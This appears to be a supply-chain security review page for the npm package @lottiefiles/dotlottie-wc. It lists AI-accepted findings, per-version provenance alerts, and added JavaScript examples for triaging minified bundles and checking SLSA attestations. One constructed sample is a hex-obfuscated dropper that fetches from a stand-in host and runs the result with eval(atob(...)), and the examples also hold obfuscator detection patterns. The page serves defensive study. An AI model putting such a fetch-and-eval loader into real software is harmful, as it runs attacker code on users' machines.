@lottiefiles/dotlottie-wc
Supply chain provenance
Status for the latest visible version.
Maintainers
Keywords
Accepted risks
Findings the reviewer chose to accept rather than block on.
| Source | Rule | Reason | Accepted by | When |
|---|---|---|---|---|
| source-diff | obfuscated-file:dist/dotlottie-Cn4v_pQB-CBtBMv4n.js | AI (source-diff): Minified dotlottie-web WASM binding; standard build output for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-BtTeeiEn.js | AI (source-diff): Minified dotlottie-web bundle; standard build output for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-MOs0qH2M.js | AI (source-diff): Minified dotlottie-web bundle with recognizable @lottiefiles/dotlottie-web internals; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-BMnS_qxa.js | AI (source-diff): Standard minified bundle with source map; consistent with tsdown build output for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-BLkQfkLV.js | AI (source-diff): Standard bundled/minified dist output for this package; not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/dist-CDWQCGVs.js | AI (source-diff): Standard minified bundle output for this package; SLSA provenance confirms CI/CD build integrity. | ai | |
| source-diff | obfuscated-file:dist/dist-BnVItZne.js | AI (source-diff): Minified dotlottie-web bundle with WASM; standard build artifact for this package. | ai | |
| source-diff | net-exec-file:dist/chunk-B6AP7WKV.js | AI (source-diff): WASM loader bundle for dotlottie-web; fetch+WebAssembly execution is the documented runtime pattern for this package. | ai | |
| source-diff | obfuscated-file:dist/dist-DHjsgXjJ.js | AI (source-diff): Minified dotlottie-web bundle with recognizable @lottiefiles/dotlottie-web internals; expected build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-CDsU-l1k.js | AI (source-diff): Standard minified bundle with accompanying source map; readable Babel/WASM glue code, not obfuscation. | ai | |
| source-diff | obfuscated-file:dist/dotlottie-DBBPxC2A-By124qvu.js | AI (source-diff): Minified dotlottie-web WASM binding code; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-XO1b9DBD.js | AI (source-diff): Minified dotlottie-web bundle with inline Worker; standard build artifact. | ai | |
| source-diff | obfuscated-file:dist/dist-CKe9q9bt.js | AI (source-diff): Minified dotlottie-web WASM binding bundle; standard build artifact matching declared dependency @lottiefiles/[email protected]. | ai | |
| source-diff | obfuscated-file:dist/dist-DO_wn7qf.js | AI (source-diff): Minified dotlottie-web bundle; standard build artifact, content matches expected library code. | ai | |
| source-diff | obfuscated-file:dist/decorate-C0oFmnNg.js | AI (source-diff): Minified Lit framework code; standard build artifact for this web component package. | ai | |
| phantom-deps | phantom-dep:@lottiefiles/dotlottie-web | AI (phantom-deps): Same-org dep bundled into dist; phantom-dep heuristic is a stable false positive for this package. | ai | |
| phantom-deps | phantom-dep:lit | AI (phantom-deps): lit is bundled into dist output; not directly imported in source but legitimately used as a runtime dep. | ai | |
| source-diff | obfuscated-file:dist/dist-GOJJVOuh.js | AI (source-diff): Standard minified dotlottie-web bundle; expected build artifact for this package. | ai | |
| source-diff | obfuscated-file:dist/decorate-DwnJ77rs.js | AI (source-diff): Standard minified Lit framework output with license headers; expected build artifact for this package. | ai | |
| provenance | slsa-provenance | AI (provenance): Package consistently publishes via CI/CD with SLSA provenance; stable pattern for this org. | ai | |
| provenance | publisher-changed | AI (provenance): Transition to GitHub Actions publisher is consistent with SLSA provenance attestation from official repo. | ai | |
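The accepted risks above rest on a distinction the tool's rules do not make on their own: a line over 3000 characters is ordinary minified build output when the file carries a source map reference and a vendor license banner and reads as recognizable library code, and is obfuscation when it shows obfuscator signatures or feeds network data into eval; likewise fetch followed by WebAssembly.instantiate is the loader pattern dotlottie-web documents, while fetch followed by eval is a dropper. The following is an added example, not code from this page or from the dotlottie-wc project, that applies that reasoning to a dist file's text. The thresholds, the vendor markers used to recognize bundled copies of lit and @lottiefiles/dotlottie-web (the two "phantom" deps above), and the three sample files are constructed for illustration.

```javascript
// Added example, not code from the page or from the dotlottie-wc project.
// Reproduces the reviewer's reasoning for the "obfuscated-file", "net-exec-file"
// and "phantom-dep" findings as a triage function over a dist file's text.
// Thresholds, vendor markers and the three sample files are constructed.

const LONG_LINE = 3000; // the page's "lines over 3000 chars" heuristic

// Signatures that ordinary minifiers do not produce (constructed list).
const OBFUSCATOR_PATTERNS = [
  /_0x[0-9a-f]{4,}/i,                                    // javascript-obfuscator style identifiers
  /\beval\s*\(\s*(atob|unescape|String\.fromCharCode)/,  // eval over a decoded payload
  /new\s+Function\s*\(\s*(atob|unescape)/,
  /\[\s*'\\x[0-9a-f]{2}/i,                               // hex-escaped string arrays
];

// Evidence that a declared dependency was bundled into dist (constructed markers;
// a real check would key these off the dependency's own license headers/exports).
const DECLARED_DEP_MARKERS = {
  lit: [/Google LLC/, /SPDX-License-Identifier: BSD-3-Clause/],
  '@lottiefiles/dotlottie-web': [/DotLottie/, /dotlottie-web/],
};

function bundledDeps(text) {
  return Object.keys(DECLARED_DEP_MARKERS)
    .filter((dep) => DECLARED_DEP_MARKERS[dep].some((re) => re.test(text)));
}

function triageBundle(name, text) {
  const maxLine = text.split('\n').reduce((m, l) => Math.max(m, l.length), 0);
  const hasSourceMap = /\/\/[#@]\s*sourceMappingURL=/.test(text);
  const hasLicenseHeader = /\/\*!|@license|Copyright/.test(text);
  const obfuscatorMarkers = OBFUSCATOR_PATTERNS.filter((re) => re.test(text)).length;
  const usesNetwork = /\b(fetch|XMLHttpRequest|WebSocket)\s*\(/.test(text);
  const usesEval = /\b(eval|new\s+Function)\s*\(/.test(text);
  const usesWasm = /WebAssembly\.(instantiate|instantiateStreaming|compile)\s*\(/.test(text);

  // The two rules as the page's tool raises them.
  const findings = [];
  if (maxLine > LONG_LINE) findings.push('obfuscated-file');
  if (usesNetwork && (usesEval || usesWasm)) findings.push('net-exec-file');

  // Order matters: obfuscator signatures or network-fed eval override any
  // "looks like build output" evidence, because a source map comment or a
  // license banner costs an attacker nothing to include.
  let verdict, reason;
  if (obfuscatorMarkers > 0 || (usesNetwork && usesEval)) {
    verdict = 'block'; reason = 'obfuscator signatures or network-fed eval';
  } else if (findings.length === 0) {
    verdict = 'clean'; reason = 'no rule fired';
  } else if (hasSourceMap || hasLicenseHeader) {
    verdict = 'accept';
    reason = findings.includes('net-exec-file')
      ? 'fetch + WebAssembly.instantiate is the documented loader pattern'
      : 'minified build output with source map or license banner';
  } else {
    verdict = 'review'; reason = 'long lines without any build-output evidence';
  }
  return { name, maxLine, findings, bundled: bundledDeps(text), verdict, reason };
}

// Constructed sample 1: a minified Lit-based bundle with license banner and source map.
const MINIFIED_BUNDLE =
  '/**\n * @license\n * Copyright 2019 Google LLC\n * SPDX-License-Identifier: BSD-3-Clause\n */\n' +
  'const t=' + JSON.stringify('a'.repeat(3200)) + ';class DotLottieWc{}export{t,DotLottieWc};\n' +
  '//# sourceMappingURL=decorate-example.js.map\n';

// Constructed sample 2: an obfuscated dropper padded to a long line.
const OBFUSCATED_DROPPER =
  "var _0x3a2f=['\\x66\\x65\\x74\\x63\\x68','\\x65\\x76\\x61\\x6c'];" +
  'fetch("https://example.invalid/p").then(r=>r.text()).then(t=>eval(atob(t)));' +
  '/*' + '#'.repeat(3100) + '*/\n';

// Constructed sample 3: a WASM loader chunk, the pattern the page accepts.
const WASM_LOADER =
  '/*! dotlottie-web renderer loader; Copyright LottieFiles; MIT */\n' +
  'export async function load(i){const r=await fetch(new URL("renderer.wasm",import.meta.url));' +
  'return WebAssembly.instantiate(await r.arrayBuffer(),i);}\n' +
  '//# sourceMappingURL=chunk-example.js.map\n';

for (const [name, text] of [
  ['dist/decorate-example.js', MINIFIED_BUNDLE],
  ['dist/dropper-example.js', OBFUSCATED_DROPPER],
  ['dist/chunk-example.js', WASM_LOADER],
]) {
  console.log(triageBundle(name, text));
}
```

The verdict order is the point: a source map reference or a license banner only earns an "accept" after the file has been checked for obfuscator signatures and for network-fed eval, since both markers are trivial to forge. The `bundled` field is what turns the phantom-dep finding into a non-finding: the declared dependency is absent from the source imports because it was compiled into the dist file, and the file shows its markers.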
Versions (showing 47 of 47)
| Version | Deps | Published |
|---|---|---|
| 0.9.16 | 2 / 6 | |
| 0.9.15 | 2 / 6 | |
| 0.9.14 | 2 / 6 | |
| 0.9.13 | 2 / 6 | |
| 0.9.12 | 2 / 6 | |
| 0.9.11 | 2 / 6 | |
| 0.9.10 | 2 / 6 | |
| 0.9.9 | 2 / 6 | |
| 0.9.8 | 2 / 6 | |
| 0.9.7 | 2 / 6 | |
| 0.9.6 | 2 / 6 | |
| 0.9.5 | 2 / 6 | |
| 0.9.4 | 2 / 6 | |
| 0.9.3 | 2 / 6 | |
| 0.9.2 | 2 / 6 | |
| 0.9.1 | 2 / 6 | |
| 0.9.0 | 2 / 6 | |
| 0.8.16 | 2 / 7 | |
| 0.8.15 | 2 / 7 | |
| 0.8.14 | 2 / 7 | |
| 0.8.13 | 2 / 7 | |
| 0.8.11 | 2 / 7 | |
| 0.8.10 | 2 / 7 | |
| 0.8.9 | 2 / 7 | |
| 0.8.8 | 2 / 7 | |
| 0.8.7 | 2 / 7 | |
| 0.8.6 | 2 / 7 | |
| 0.8.5 | 2 / 7 | |
| 0.8.4 | 2 / 7 | |
| 0.8.3 | 2 / 7 | |
| 0.8.2 | 2 / 7 | |
| 0.8.1 | 2 / 7 | |
| 0.8.0 | 2 / 7 | |
| 0.7.7 | 2 / 7 | |
| 0.7.6 | 2 / 7 | |
| 0.7.5 | 2 / 7 | |
| 0.7.4 | 2 / 7 | |
| 0.7.3 | 2 / 7 | |
| 0.7.2 | 2 / 7 | |
| 0.7.1 | 2 / 7 | |
| 0.7.0 | 2 / 7 | |
| 0.6.4 | 2 / 7 | |
| 0.6.3 | 2 / 7 | |
| 0.6.2 | 2 / 7 | |
| 0.6.1 | 2 / 7 | |
| 0.6.0 | 2 / 7 | |
| 0.5.3 | 2 / 7 | |
v0.9.16 (2 findings)
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.15 (2 findings)
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.14 (2 findings)
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.13 (2 findings)
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.11 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.10 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.9 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.8 (4 findings)
- This version was published by a different npm account than previous versions on 2026-03-17. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.7 (4 findings)
- This version was published by a different npm account than previous versions on 2026-03-13. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.6 (5 findings)
- This version was published by a different npm account than previous versions on 2026-03-12. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.5 (5 findings)
- This version was published by a different npm account than previous versions on 2026-03-10. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.4 (4 findings)
- This version was published by a different npm account than previous versions on 2026-02-25. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.3 (4 findings)
- This version was published by a different npm account than previous versions on 2026-02-23. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.2 (4 findings)
- This version was published by a different npm account than previous versions on 2026-02-18. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.1 (4 findings)
- This version was published by a different npm account than previous versions on 2026-02-17. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.9.0 (4 findings)
- This version was published by a different npm account than previous versions on 2026-02-16. This could indicate a legitimate maintainer transition or an account compromise.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Newly added source file contains lines over 3000 chars, suggesting minified or obfuscated code. New obfuscated files are a strong attack indicator.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.16 (2 findings)
- This version was published by a different npm account than previous versions on 2026-02-12. This could indicate a legitimate maintainer transition or an account compromise.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.15 (2 findings)
- This version was published by a different npm account than previous versions on 2026-02-05. This could indicate a legitimate maintainer transition or an account compromise.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.14 (2 findings)
- This version was published by a different npm account than previous versions on 2026-01-14. This could indicate a legitimate maintainer transition or an account compromise.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.13 (2 findings)
- This version was published by a different npm account than previous versions on 2025-12-25. This could indicate a legitimate maintainer transition or an account compromise.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.11 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.10 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.9 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.8 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.7 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.6 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.5 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.4 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.3 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.2 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.1 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.8.0 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.7 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.6 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.5 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.4 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.3 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.2 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.1 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.7.0 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.4 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.3 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.2 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.1 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.6.0 (2 findings)
- Newly added file contains both network calls and dynamic code execution. This is a hallmark of dropper/loader malware.
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
v0.5.3 (1 finding)
- Published via CI/CD with Sigstore attestation (predicate: https://slsa.dev/provenance/v1). This is the strongest supply chain integrity signal.
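A SLSA provenance attestation proves that the registry artifact was built by a particular CI workflow from a particular repository commit; it says nothing about whether that commit is benign, so "strongest supply chain integrity signal" in the findings above should be read as the strongest evidence about origin, not about content. What makes the publisher-changed entries acceptable (the accepted risk recorded above) is that the new publisher's attestation binds the build to the official repository and workflow; what would make a future entry alarming is an attestation that disappears after a run of attested releases. The following is an added example, not the page's tooling or the dotlottie-wc project's code, that walks a version history oldest-first and applies those two checks. The record fields mirror what the npm registry returns per version (dist.attestations.provenance.predicateType and _npmUser) and the predicate layout follows the SLSA v1 GitHub Actions build type, but every publisher name, URL, repository and version number in it is constructed.

```javascript
// Added example, not the page's tooling or the dotlottie-wc project's code.
// Reproduces the "slsa-provenance" and "publisher-changed" reasoning over a
// version history, oldest first. Field names follow the npm registry's
// per-version record; all values below are constructed.

const SLSA_V1 = 'https://slsa.dev/provenance/v1';

// The build identity a reviewer expects (constructed). For a real package, take
// the repository from package.json and the workflow path from that repository.
const EXPECTED = {
  repository: 'https://github.com/example-org/example-wc',
  workflowPath: '.github/workflows/release.yml',
  builderId: 'https://github.com/actions/runner/github-hosted',
};

// Does the decoded provenance predicate bind this artifact to the expected
// repository, workflow and builder? Anything else is "review", not "accept".
function provenanceBinding(predicate, expected) {
  const wf = predicate && predicate.buildDefinition &&
    predicate.buildDefinition.externalParameters &&
    predicate.buildDefinition.externalParameters.workflow;
  const builderId = predicate && predicate.runDetails &&
    predicate.runDetails.builder && predicate.runDetails.builder.id;
  if (!wf) return { bound: false, reason: 'no workflow in predicate' };
  if (wf.repository !== expected.repository) return { bound: false, reason: 'repository mismatch: ' + wf.repository };
  if (wf.path !== expected.workflowPath) return { bound: false, reason: 'workflow mismatch: ' + wf.path };
  if (builderId !== expected.builderId) return { bound: false, reason: 'builder mismatch: ' + builderId };
  return { bound: true, reason: 'repository, workflow and builder match' };
}

function assessVersion(prev, cur, expected) {
  const att = cur.dist && cur.dist.attestations;
  const hasProvenance = Boolean(att && att.provenance && att.provenance.predicateType === SLSA_V1);
  const prevHadProvenance = Boolean(prev && prev.dist && prev.dist.attestations);
  const publisherChanged = Boolean(prev && prev._npmUser.name !== cur._npmUser.name);

  const findings = [];
  if (hasProvenance) findings.push('slsa-provenance');
  if (publisherChanged) findings.push('publisher-changed');
  if (prevHadProvenance && !hasProvenance) findings.push('provenance-dropped');

  let verdict, reason;
  if (prevHadProvenance && !hasProvenance) {
    // Losing the attestation after a run of attested releases is the case that
    // matters most: the attestation proves where a build came from only while it exists.
    verdict = 'review'; reason = 'previous version was attested, this one is not';
  } else if (publisherChanged) {
    const b = hasProvenance ? provenanceBinding(cur.provenancePredicate, expected)
                            : { bound: false, reason: 'no attestation' };
    verdict = b.bound ? 'accept' : 'review';
    reason = 'new publisher ' + cur._npmUser.name + '; ' + b.reason;
  } else if (!hasProvenance) {
    verdict = 'unattested'; reason = 'no attestation to check';
  } else {
    verdict = 'ok'; reason = 'attested, same publisher as the previous version';
  }
  return { version: cur.version, findings, verdict, reason };
}

function assessReleaseHistory(versions, expected) {
  return versions.map((v, i) => assessVersion(i > 0 ? versions[i - 1] : null, v, expected));
}

// Constructed history. "provenancePredicate" stands in for the decoded
// in-toto statement that the registry serves as a Sigstore bundle.
function attested(repository) {
  return {
    dist: {
      attestations: {
        url: 'https://registry.example/-/npm/v1/attestations/example-wc',
        provenance: { predicateType: SLSA_V1 },
      },
    },
    provenancePredicate: {
      buildDefinition: {
        buildType: 'https://slsa-framework.github.io/github-actions-buildtypes/workflow/v1',
        externalParameters: { workflow: { ref: 'refs/heads/main', repository, path: '.github/workflows/release.yml' } },
      },
      runDetails: { builder: { id: EXPECTED.builderId } },
    },
  };
}

const HISTORY = [
  { version: '0.0.1', _npmUser: { name: 'user-a' }, ...attested(EXPECTED.repository) },
  { version: '0.0.2', _npmUser: { name: 'user-b' }, ...attested(EXPECTED.repository) },           // CI account takes over publishing
  { version: '0.0.3', _npmUser: { name: 'user-c' }, ...attested('https://github.com/someone/fork') }, // attested, but from the wrong repo
  { version: '0.0.4', _npmUser: { name: 'user-c' }, dist: { tarball: 'https://registry.example/example-wc-0.0.4.tgz' } }, // attestation gone
];

for (const r of assessReleaseHistory(HISTORY, EXPECTED)) console.log(r);
```

For a real package, `npm audit signatures` performs the cryptographic part of this check against the registry for everything in a project's lockfile, and the packument's `dist.attestations` field is where the predicate type quoted in the findings above comes from; the repository and workflow inside the decoded predicate are what to compare against the package's declared repository, since a valid attestation from the wrong repository is exactly the case a publisher change should catch.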